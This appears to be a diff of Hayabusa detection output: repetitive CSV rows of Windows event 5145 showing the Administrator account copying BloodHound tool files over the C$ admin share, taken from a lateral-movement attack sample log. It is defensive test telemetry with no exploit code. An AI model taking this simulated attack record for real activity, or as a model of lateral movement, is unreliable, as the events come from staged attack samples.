+2019-03-18 23:23:24.838 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.parsers.json | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.pathfinding.astar | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.activeState | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.animate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.colorbrewer | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.design | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.848 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.dragNodes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.edgeSiblings | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.filter | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.fullScreen | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.generators | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.858 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.keyboard | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.lasso | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.leaflet | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.legend | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.868 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.locate | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.neighborhoods | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.poweredBy | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.relativeSize | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.select | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.878 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.plugins.tooltips | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.customEdgeShapes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.edgeLabels | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.glyphs | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.888 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.halo | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.renderers.linkurious | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.898 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.HITS | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\plugins\sigma.statistics.louvain | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\scripts | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.908 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\captors | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\classes | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\middlewares | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\misc | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.918 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\renderers | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\linkurious\src\utils | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\listenercount\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\locate-path | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.928 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.968 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\lodash\fp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.978 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\loose-envify | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\make-dir | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\md5-file | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimatch | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.988 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\example | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:24.998 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\minimist\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\bin | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\examples | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.008 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mkdirp\test | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
+2019-03-18 23:23:25.018 +09:00,PC01.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\user01\Desktop\BloodHound-win32-x64\BloodHound-win32-x64\resources\app\node_modules\mustache | IP Addr: 10.0.2.15 | LID: 0xfc635,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_5145_Remote_FileCopy.evtx
